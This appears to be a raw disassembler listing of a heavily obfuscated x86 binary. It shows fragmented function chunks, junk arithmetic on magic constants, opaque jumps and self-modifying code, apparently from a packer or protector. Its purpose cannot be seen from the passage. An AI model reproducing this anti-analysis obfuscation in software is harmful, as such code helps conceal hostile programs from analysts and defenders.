loc_453505: ; CODE XREF: ut7h7i2x:loc_44D285j
test al, al
jz loc_4431B5
jmp loc_43B09D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_453512: ; CODE XREF: sub_449B8E+F1ABj
cmp edi, 8BA7FAFBh
jmp loc_4494E3
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_45351D: ; CODE XREF: sub_44C791-DF14j
jnz loc_43E7B0
jmp loc_457D6C
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447E29
loc_453528: ; CODE XREF: sub_447E29:loc_44750Bj
push 0BF5BE61Dh
pop eax
and eax, 76BEAE69h
cmp eax, 0FD8EC8Dh
jmp loc_4502BC
; END OF FUNCTION CHUNK FOR sub_447E29
; ---------------------------------------------------------------------------
loc_45353F: ; CODE XREF: ut7h7i2x:004462F7j
xor edi, ebx
or edi, 0C27B4403h
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_453547: ; CODE XREF: sub_43FF65:loc_4462DDj
rol esi, 7
sub esi, 86D886D5h
add esi, 0D8A508C6h
xchg esi, [esp+0]
jmp loc_444F91
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_45355E: ; CODE XREF: sub_443816-7AF8j
mov ebx, edx
xchg ebx, [esp+0]
call sub_45341C
mov eax, 0DA4431C0h
jmp loc_43B415
; END OF FUNCTION CHUNK FOR sub_443816
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_453572: ; CODE XREF: sub_442B3B+E1AEj
xchg ebx, [esp+0]
call sub_446B90
mov eax, 201E933Eh
call sub_43AA94
push edi
push 8FCEF99Ch
pop edi
rol edi, 1Dh
jmp loc_4576EC
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_453593: ; CODE XREF: sub_44A3BB:loc_44E09Aj
push 6780EE10h
pop eax
xor eax, 0CB9687D9h
and eax, 487A68Fh
cmp eax, 0EC009043h
jmp loc_441BF9
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_4535B0: ; CODE XREF: sub_445AD1:loc_44B521j
and eax, 9004DE25h
add eax, 0F044487Fh
xchg eax, [esp+0]
jmp loc_43EDF6
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_4535C4: ; CODE XREF: sub_45410C:loc_43A8EAj
jz loc_443D12
jmp loc_43E79C
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_4535CF: ; CODE XREF: sub_444374:loc_457D47j
push eax
pushf
push 63ABC199h
pop eax
and eax, 6870E0CAh
xor eax, 0A78A6D84h
or eax, 0ECB225BBh
rol eax, 1Bh
jmp loc_43F77A
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4512E6
loc_4535F1: ; CODE XREF: sub_4512E6:loc_45A6DBj
; sub_4512E6:loc_45A6EBj
sub esi, 61E20F86h
test esi, 80000h
jmp loc_457A5C
; END OF FUNCTION CHUNK FOR sub_4512E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_453602: ; CODE XREF: sub_44EC11-7880j
not edi
add edx, 0AFDF23E4h
loc_45360A: ; CODE XREF: sub_44EC11:loc_43EDB4j
xor eax, eax
push offset loc_4474EF
jmp loc_454AD4
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
loc_453616: ; CODE XREF: ut7h7i2x:loc_44CD18j
jz loc_43D9D2
jmp loc_4438AA
; =============== S U B R O U T I N E =======================================
sub_453621 proc near ; CODE XREF: ut7h7i2x:0043AC43j
; sub_43BB92+Cp
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
add edx, 363F78B7h
xchg edx, [esp-4+arg_0]
jmp loc_43CB3F
sub_453621 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441501
loc_453633: ; CODE XREF: sub_441501:loc_43FF4Dj
sub eax, 9A7DF8E0h
or eax, 2B3E8AEBh
sub eax, 0D1D99DF1h
add eax, 73E3B4CBh
call sub_43AA94
push offset loc_43ED45
jmp nullsub_469
; END OF FUNCTION CHUNK FOR sub_441501
; ---------------------------------------------------------------------------
loc_45365A: ; DATA XREF: sub_446151:loc_44EC07o
mov eax, [eax+30h]
mov eax, [eax+18h]
cmp dword ptr [eax+10h], 0
jz locret_44D7E4
jmp loc_459DD6
; ---------------------------------------------------------------------------
loc_45366F: ; CODE XREF: ut7h7i2x:0044596Dj
xchg edi, [esp]
pop edi
mov eax, [esp]
push ecx
mov ecx, edx
jmp loc_43A192
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_45367E: ; CODE XREF: sub_442AD1:loc_43A340j
push 6FDDC87Eh
loc_453683: ; CODE XREF: sub_446F9A:loc_458445j
pop edx
xor edx, 0B9261A69h
cmp edx, 0FBD119B7h
jmp loc_4411DC
; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_453695: ; CODE XREF: sub_43B847:loc_44B010j
jz loc_44382D
; END OF FUNCTION CHUNK FOR sub_43B847
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_45369B: ; CODE XREF: sub_446CA0+C010j
jmp loc_443944
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_4536A0: ; CODE XREF: sub_444EAA:loc_444EBEj
jmp loc_4399EA
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
sbb ebp, esi
push 68DD3E6h
jmp loc_44382D
; ---------------------------------------------------------------------------
loc_4536B1: ; CODE XREF: ut7h7i2x:00451EC2j
mov edi, 212B2E8Ch
loc_4536B6: ; CODE XREF: ut7h7i2x:loc_451EB5j
rol eax, 5
add eax, 6F4B9224h
call sub_43AED9
loc_4536C4: ; CODE XREF: ut7h7i2x:0044AB48j
mov ds:off_41D010, eax
call sub_458BDB
; START OF FUNCTION CHUNK FOR sub_449FB0
loc_4536CF: ; CODE XREF: sub_449FB0+Ej
jmp loc_456F33
; END OF FUNCTION CHUNK FOR sub_449FB0
; ---------------------------------------------------------------------------
loc_4536D4: ; CODE XREF: ut7h7i2x:0044EAADj
jbe loc_4465A0
xor edx, 6D80EE9h
jmp loc_452608
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_4536E5: ; CODE XREF: sub_4549F0:loc_43FAF3j
test al, al
jz sub_447CEB
jmp loc_44814C
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
loc_4536F2: ; CODE XREF: ut7h7i2x:00439921j
and edi, ds:4000FAh
rol edi, 14h
test edi, 80h
jmp loc_44EE48
; ---------------------------------------------------------------------------
shl esi, 1Eh
jmp loc_454AF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_45370E: ; CODE XREF: sub_44124A+11j
jz loc_458C8B
jmp loc_456FC3
; END OF FUNCTION CHUNK FOR sub_44124A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_453719: ; CODE XREF: sub_443BC5:loc_44C72Bj
sbb ebp, 96F68461h
jmp loc_455B0C
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
loc_453724: ; CODE XREF: ut7h7i2x:00450B00j
jnz loc_43B589
jmp loc_451F4B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_45372F: ; CODE XREF: sub_43D021:loc_43FAE2j
jnz loc_44B420
jmp loc_4402F1
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_45373A: ; CODE XREF: sub_446258-7101j
; sub_446258+3204j
and eax, 161BB550h
sub eax, 0F74893D1h
add eax, 0E17D7795h
xchg eax, [esp+4+var_4]
jmp loc_45890F
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_453754: ; CODE XREF: sub_4402A5-4B34j
jnz loc_44C185
jmp loc_441240
; END OF FUNCTION CHUNK FOR sub_4402A5
; ---------------------------------------------------------------------------
call sub_444DE9
mov dword ptr [ebp-4], 1
push 0D4DD550Eh
pop eax
jmp loc_43D15B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_453776: ; CODE XREF: sub_43FF65+12884j
jz loc_44DDE3
jmp loc_45717C
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_453781: ; CODE XREF: sub_4489DF:loc_44330Dj
add eax, 965E7AD6h
xchg eax, [esp+0]
jmp loc_44173A
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
loc_45378F: ; CODE XREF: ut7h7i2x:00453425j
pushf
; =============== S U B R O U T I N E =======================================
sub_453790 proc near ; CODE XREF: ut7h7i2x:0044AB59p
; FUNCTION CHUNK AT 004406E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440FD8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00446127 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B25B SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push 0
lea eax, [ebp-20h]
jmp loc_4406E7
sub_453790 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F613
loc_45379E: ; CODE XREF: sub_44F613-11E81j
mov eax, ebx
loc_4537A0: ; CODE XREF: sub_44F613:loc_43D787j
and edx, 4BD15B0Dh
loc_4537A6: ; CODE XREF: sub_45742F:loc_43CA4Fj
add edx, 3D9A1A6Bh
; END OF FUNCTION CHUNK FOR sub_44F613
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_4537AC: ; CODE XREF: sub_44DB48:loc_43F56Bj
xor edx, 23DFFB87h
call sub_43A92F
loc_4537B7: ; CODE XREF: ut7h7i2x:0044F191j
jmp loc_43EB7F
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440F8E
loc_4537BC: ; CODE XREF: sub_440F8E+869Fj
jmp loc_443284
; END OF FUNCTION CHUNK FOR sub_440F8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_4537C1: ; CODE XREF: sub_43CE34+7877j
jo loc_440BAF
loc_4537C7: ; CODE XREF: sub_43CE34:loc_44301Dj
push 381480B1h
pop eax
or eax, 587190D7h
add eax, 0B919B528h
cmp eax, 6DE22722h
jmp loc_453925
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4543E9
loc_4537E4: ; CODE XREF: sub_4543E9+1Bj
xor ecx, 5636504Ah
add eax, ecx
pop ecx
push edi
jmp loc_442E21
; END OF FUNCTION CHUNK FOR sub_4543E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_4537F3: ; CODE XREF: sub_450645:loc_44F0CDj
jz loc_43B7B6
jmp loc_43C3DC
; END OF FUNCTION CHUNK FOR sub_450645
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4555CE
loc_4537FE: ; CODE XREF: sub_4555CE+3BC8j
; sub_4555CE:loc_45995Bj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_459303
jmp loc_44B0DA
; END OF FUNCTION CHUNK FOR sub_4555CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_45380F: ; CODE XREF: sub_450FDE:loc_455D1Aj
push 2010h
push 0
lea eax, [ebp-100h]
loc_45381C: ; CODE XREF: sub_43AA94:loc_45AB69j
push edx
jmp loc_43BDC9
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4552AC
loc_453822: ; CODE XREF: sub_4552AC:loc_455667j
push ecx
mov ecx, edx
xchg ecx, [esp+4+var_4]
push 0
push eax
call sub_43C08A
loc_453830: ; CODE XREF: sub_43BE93+D4C2j
jmp nullsub_221
; END OF FUNCTION CHUNK FOR sub_4552AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_453835: ; CODE XREF: sub_450651+6j
mov [ebp+var_4], eax
loc_453838: ; CODE XREF: sub_450651:loc_458094j
js loc_44CB14
push offset sub_447267
jmp nullsub_167
; END OF FUNCTION CHUNK FOR sub_450651
; ---------------------------------------------------------------------------
loc_453848: ; CODE XREF: ut7h7i2x:loc_43A1BBj
jz loc_458F33
jmp loc_45A628
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_453853: ; CODE XREF: sub_43BA9E-2513j
ja sub_43DDEF
loc_453859: ; CODE XREF: ut7h7i2x:loc_44A3A6j
and ecx, 48B34ED5h
add ecx, 0B830694Bh
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
loc_453869: ; CODE XREF: ut7h7i2x:loc_43E86Bj
jz nullsub_529
jmp loc_448032
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_453874: ; CODE XREF: sub_458CBB-1112j
popf
and edi, 4D28332Fh
jmp loc_450A84
; END OF FUNCTION CHUNK FOR sub_458CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_453880: ; CODE XREF: sub_4402A5+30F5j
rol esi, 0Ch
jmp loc_44C185
; END OF FUNCTION CHUNK FOR sub_4402A5
; ---------------------------------------------------------------------------
locret_453888: ; CODE XREF: ut7h7i2x:00445A64j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_453889: ; CODE XREF: sub_4558CC-82CEj
jmp loc_43B30C
; END OF FUNCTION CHUNK FOR sub_4558CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CEF8
loc_45388E: ; CODE XREF: sub_43CEF8+D590j
jmp loc_43962C
; END OF FUNCTION CHUNK FOR sub_43CEF8
; ---------------------------------------------------------------------------
call sub_43BA59
or eax, eax
jmp loc_458882
; ---------------------------------------------------------------------------
loc_45389F: ; CODE XREF: ut7h7i2x:00445A16j
mov edx, ds:dword_449C78
or edx, edx
jnz loc_44A137
jmp loc_44B398
; ---------------------------------------------------------------------------
aZL_zLq_SB db '‡<$‹Ï_‡<$‹ï_Ãé',0Ah ; CODE XREF: sub_44941C+F835j
; DATA XREF: sub_4503C3:loc_451AAFo
db 'B',0
align 4
; START OF FUNCTION CHUNK FOR sub_44C273
loc_4538C4: ; CODE XREF: sub_44C273+A74Dj
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_4538C9: ; CODE XREF: sub_453E14-B35Fj
jmp loc_45A42E
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_4538CE: ; CODE XREF: sub_44602A+108Aj
jmp loc_43C082
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445235
loc_4538D3: ; CODE XREF: sub_445235+721Cj
and eax, edi
adc esi, ebx
jmp loc_441EB3
; END OF FUNCTION CHUNK FOR sub_445235
; ---------------------------------------------------------------------------
loc_4538DC: ; CODE XREF: ut7h7i2x:loc_43B437j
; ut7h7i2x:0043B44Aj
xor eax, 99AC3F5Ah
xchg eax, [esp]
push ecx
pushf
push 0AA0270A1h
pop ecx
xor ecx, 5E4203C1h
and ecx, ds:4000F7h
jmp loc_4504F8
; ---------------------------------------------------------------------------
loc_4538FE: ; CODE XREF: ut7h7i2x:004572F9j
jg loc_44A125
loc_453904: ; CODE XREF: ut7h7i2x:loc_44ED88j
push eax
lea eax, dword_449C7C
push offset sub_43918A
jmp loc_446D67
; ---------------------------------------------------------------------------
jo loc_443E1B
mov edx, 808D3894h
jmp sub_4390DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_453925: ; CODE XREF: sub_43CE34+169ABj
jl loc_44276C
mov eax, 0C9737F19h
popf
jmp loc_442766
; END OF FUNCTION CHUNK FOR sub_43CE34
; =============== S U B R O U T I N E =======================================
sub_453936 proc near ; DATA XREF: sub_456EE0+7o
mov eax, [esp+0]
push edx
push offset loc_44EFA5
jmp nullsub_279
sub_453936 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_549. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_453946: ; CODE XREF: ut7h7i2x:0044E610j
; DATA XREF: sub_445BA6+7o
jnz loc_451C0F
mov eax, [ebp+8]
push eax
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
setz al
loc_45395D: ; CODE XREF: ut7h7i2x:loc_459CC0j
call sub_45A2AD
pop ecx
jmp loc_448555
; ---------------------------------------------------------------------------
loc_453968: ; CODE XREF: ut7h7i2x:0044808Ej
; DATA XREF: sub_443A21+61BDo
add edx, edi
pop edi
mov edx, [edx]
push edx
push eax
push esi
mov esi, ecx
xchg esi, [esp]
jmp loc_443A36
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_45397A: ; CODE XREF: sub_43D021+DEEEj
cdq
cmp ecx, ebx
jmp loc_45AB9C
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
loc_453982: ; CODE XREF: ut7h7i2x:00456F73j
cmp eax, 0D857B808h
jmp loc_43B04D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4443DE
loc_45398D: ; CODE XREF: sub_4443DE:loc_4532ACj
; sub_4443DE+EED9j
add eax, 48E277A9h
push offset sub_444EAA
loc_453998: ; CODE XREF: ut7h7i2x:00451C42j
jmp loc_4434F3
; END OF FUNCTION CHUNK FOR sub_4443DE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456B6
loc_45399E: ; CODE XREF: sub_4456B6+9DF8j
call sub_43F365
or eax, 0A1B58BB1h
jmp sub_4395FB
; END OF FUNCTION CHUNK FOR sub_4456B6
; ---------------------------------------------------------------------------
loc_4539AE: ; DATA XREF: sub_44ADE5+Ao
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_441EBE
jmp loc_441888
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_4539BE: ; CODE XREF: sub_43B9B1:loc_45964Ej
jz loc_445B8F
jmp loc_442158
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_4539CA: ; CODE XREF: ut7h7i2x:004397EDj
jmp loc_43F708
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4539CF: ; CODE XREF: sub_43FF65+4j
push esi
push 5B9D3D1Bh
pop esi
xor esi, 30C1CDD9h
jmp loc_43EE1B
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_4539E1: ; CODE XREF: sub_441765+E1D9j
jp loc_4554FE
xor esi, ecx
jmp loc_44328D
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_4539EE: ; CODE XREF: sub_43CCC3:loc_4573AAj
mov eax, [ebp-104h]
cmp byte ptr [eax], 0
jnz loc_43F936
jmp loc_451FBB
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_453A02: ; CODE XREF: sub_44F57E+77F9j
pop eax
xchg ebp, [esp-8+arg_4]
or ecx, 0D7704779h
jmp loc_43C92F
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
loc_453A11: ; CODE XREF: ut7h7i2x:00444198j
mov esi, ebx
xchg ebx, [esp]
pop ebx
js loc_44D901
loc_453A1D: ; CODE XREF: ut7h7i2x:004550BDj
pop edx
mov eax, [esp]
push edx
push ecx
jmp loc_43ADA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455CD8
loc_453A28: ; CODE XREF: sub_455CD8+11j
or ecx, 9F95C7CDh
add ecx, 60A6E757h
xchg ecx, [esp+0]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_455CD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D17F
loc_453A3C: ; CODE XREF: sub_43D17F+BDE4j
push 6B47C80Ch
shl esi, 1
and ebp, 59312595h
ror esi, 3
loc_453A4C: ; CODE XREF: sub_43D17F+BDDCj
add esi, 325D3445h
xchg esi, [esp+0]
jmp loc_43CB3A
; END OF FUNCTION CHUNK FOR sub_43D17F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_453A5A: ; CODE XREF: sub_439BD1+777Cj
sbb ebp, 19BDE27Ah
jmp loc_4510B0
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_453A65: ; CODE XREF: sub_446CA0:loc_43BA54j
call sub_442C6B
; END OF FUNCTION CHUNK FOR sub_446CA0
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_453A6A: ; CODE XREF: sub_43FCEE+21F7j
; sub_43FCEE+5957j
add esi, 0D04EC0D8h
mov [esi], eax
xchg ecx, [esp+4+var_4]
mov esi, ecx
pop ecx
lea eax, loc_4410B2
mov byte ptr [eax], 0C3h
jmp loc_4410B2
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
sub edx, 0C3990D92h
jmp sub_43A76A
; =============== S U B R O U T I N E =======================================
sub_453A91 proc near ; CODE XREF: ut7h7i2x:004468CAj
; ut7h7i2x:004568B8p
; FUNCTION CHUNK AT 00439762 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004398C9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CD7A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D4C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F740 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458FAF SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
sbb eax, ebx
xor edx, 21A562F1h
call sub_458D6E
loc_453AA2: ; CODE XREF: sub_45A693+8j
jmp loc_43CD7A
sub_453A91 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445E4
loc_453AA7: ; CODE XREF: sub_4445E4+18j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_4445E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_453AAC: ; CODE XREF: sub_43B9B1:loc_4565CDj
jnz loc_454070
jmp loc_441718
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
loc_453AB7: ; CODE XREF: ut7h7i2x:00457662j
jz loc_448332
jmp loc_43BE86
; ---------------------------------------------------------------------------
loc_453AC2: ; CODE XREF: ut7h7i2x:0043DA57j
jl loc_43F33A
jbe loc_443C1E
jmp loc_458D0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455239
loc_453AD3: ; CODE XREF: sub_455239j
push offset sub_44E9E4
jmp nullsub_215
; END OF FUNCTION CHUNK FOR sub_455239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444E04
loc_453ADD: ; CODE XREF: sub_444E04+DA32j
sub eax, 42441E8Dh
xor eax, 8A278880h
add eax, ebp
add eax, 8D65A651h
mov eax, [eax]
mov al, [eax]
push offset loc_45A6AF
jmp nullsub_171
; END OF FUNCTION CHUNK FOR sub_444E04
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_453AFF: ; CODE XREF: sub_44B45E-7B69j
jns loc_44592D
sbb edx, 4E531B2h
jmp loc_44F421
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_453B10: ; CODE XREF: sub_444AA3+E141j
; sub_444AA3:loc_453153j
mov eax, 33F214AFh
call sub_43AA94
push ecx
push 0AC07F52Ah
jmp loc_43D627
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
loc_453B25: ; CODE XREF: ut7h7i2x:00439D40j
jge loc_441614
xor edx, eax
jmp loc_44CBDA
; ---------------------------------------------------------------------------
loc_453B32: ; CODE XREF: ut7h7i2x:0044F5CEj
pushf
push 36474A0Bh
pop ecx
add ecx, 0D072089Fh
jmp loc_4513A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_388. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_453B45: ; CODE XREF: sub_446CA0:loc_448A88j
jz loc_448B3E
jmp loc_44C735
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
push ebp
jmp sub_43E6EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_453B56: ; CODE XREF: sub_43F7A5+3D88j
adc eax, edi
test ecx, esi
jmp loc_451FD0
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC6F
loc_453B5F: ; CODE XREF: sub_44EC6F-5077j
ror edi, 1Fh
xchg edx, [eax]
loc_453B64: ; CODE XREF: sub_44EC6F:loc_449BE8j
xor edi, 0D1F0317Ch
xor eax, edi
pop edi
push offset sub_44DF13
jmp nullsub_362
; END OF FUNCTION CHUNK FOR sub_44EC6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_453B77: ; CODE XREF: sub_4448AF+B471j
add ebx, 0FDC61D4h
push offset loc_4553B5
jmp loc_43E8F1
; END OF FUNCTION CHUNK FOR sub_4448AF
; =============== S U B R O U T I N E =======================================
sub_453B87 proc near ; CODE XREF: ut7h7i2x:00444556j
; ut7h7i2x:00454E45p
xchg edi, [esp+0]
pop edi
pop ecx
mov eax, [eax]
push ecx
push offset sub_44EA25
jmp nullsub_560
sub_453B87 endp
; ---------------------------------------------------------------------------
loc_453B99: ; DATA XREF: ut7h7i2x:loc_450907o
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
push offset loc_44DF5A
jmp loc_440096
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_453BAA: ; CODE XREF: sub_4462B0:loc_4548F8j
jge loc_44F1ED
; END OF FUNCTION CHUNK FOR sub_4462B0
; START OF FUNCTION CHUNK FOR sub_44064B
loc_453BB0: ; CODE XREF: sub_44064B+193E0j
jmp loc_43FA03
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
loc_453BB5: ; CODE XREF: ut7h7i2x:0044A29Bj
jmp loc_43949B
; ---------------------------------------------------------------------------
mov ebx, [edi]
mov ebx, 0EB1E44ECh
push 22A63166h
jmp loc_446571
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_433. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sbb ecx, edx
jmp loc_447ED6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_453BD3: ; CODE XREF: sub_43A0C7-534j
; sub_43A0C7:loc_442961j
push eax
lea eax, loc_453CCE+2
push offset loc_453F68
jmp loc_44048E
; END OF FUNCTION CHUNK FOR sub_43A0C7
; ---------------------------------------------------------------------------
sub eax, 0F99B35FBh
jmp sub_452CE7
; ---------------------------------------------------------------------------
loc_453BEF: ; CODE XREF: ut7h7i2x:00457734j
cdq
; START OF FUNCTION CHUNK FOR sub_444D26
loc_453BF0: ; CODE XREF: sub_444D26:loc_43D18Ej
rol ebx, 16h
add ebx, 53DB20h
xchg ebx, [esp+0]
jmp loc_457EEA
; END OF FUNCTION CHUNK FOR sub_444D26
; ---------------------------------------------------------------------------
loc_453C01: ; DATA XREF: sub_443E2D+8o
cmp ds:dword_43A7C0, 0
jnz loc_456F7D
call nullsub_19
call sub_453D8B
mov edx, 0CF0182F6h
call sub_44B8F8
mov ds:dword_43A7C0, eax
jmp loc_44EC2F
; =============== S U B R O U T I N E =======================================
sub_453C2C proc near ; CODE XREF: sub_43CA2Dj
